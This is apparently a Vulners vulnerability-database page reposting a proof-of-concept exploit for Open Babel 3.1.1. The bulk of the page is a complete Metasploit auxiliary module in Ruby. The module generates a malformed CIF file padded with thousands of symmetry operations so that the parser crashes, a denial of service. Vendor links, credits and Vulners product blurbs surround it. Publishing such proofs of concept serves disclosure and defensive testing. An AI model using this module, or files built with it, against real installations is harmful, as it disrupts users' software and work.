Vulners
Lucene search
📄 Open Babel 3.1.1 CIF File Memory Corruption
=============================================================================================================================================
| # Title : Open Babel 3.1.1 CIF File Memory Corruption PoC Metasploit Auxiliary Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://openbabel.org/index.html |
=============================================================================================================================================
[+] Summary : This Metasploit auxiliary module generates a crafted .cif file designed to test for memory corruption conditions in Open Babel 3.1.1. By providing an excessive number of symmetry operations, it triggers a crash (DoS) during file parsing.
The exact outcome depends on the target’s build, compiler settings, and memory allocator. The module includes configurable parameters for file name and iteration count, with safe upper limits to prevent framework instability.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Open Babel 3.1.1 CIF File Parsing Memory Corruption PoC',
'Description' => %q{
This module generates a crafted .cif file designed to test for memory corruption
conditions in Open Babel 3.1.1. By providing an excessive number of
symmetry operations, the module attempts to trigger a crash during the
parsing process. The outcome may vary significantly depending on the target's
build configuration, compiler optimizations, and memory allocator.
},
'License' => MSF_LICENSE,
'Author' => [ 'indoushka' ],
'References' =>
[
[ 'URL', 'https://github.com/openbabel/openbabel/issues' ]
],
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE ],
'SideEffects' => [ IOC_IN_LOGS ]
}
))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'test_case.cif']),
OptInt.new('ITERATIONS', [ true, 'Number of symmetry operations (Limit: 1-5000)', 500])
])
end
def check
CheckCode::Unknown
end
def run
count = datastore['ITERATIONS']
if count <= 0
print_error("ITERATIONS must be a positive integer. Setting to default (500).")
count = 500
elsif count > 5000
print_warning("ITERATIONS exceeds the safe limit of 5000. Capping for stability.")
count = 5000
end
symops_array = Array.new(count) do |i|
"'#{i + 1}*x, #{i + 1}*y, #{i + 1}*z'"
end
symops = symops_array.join("\n")
cif_payload = <<~EOF
data_OPEN_BABEL_TEST
_cell_length_a 10.0
_cell_length_b 10.0
_cell_length_c 10.0
_cell_angle_alpha 90.0
_cell_angle_beta 90.0
_cell_angle_gamma 90.0
loop_
_space_group_symop_operation_xyz
#{symops}
EOF
print_status("Generating PoC file: #{datastore['FILENAME']} with #{count} iterations...")
file_create(cif_payload)
print_good("PoC file generated successfully.")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Feb 2026 00:00Current
5.6Medium risk
Vulners AI Score5.6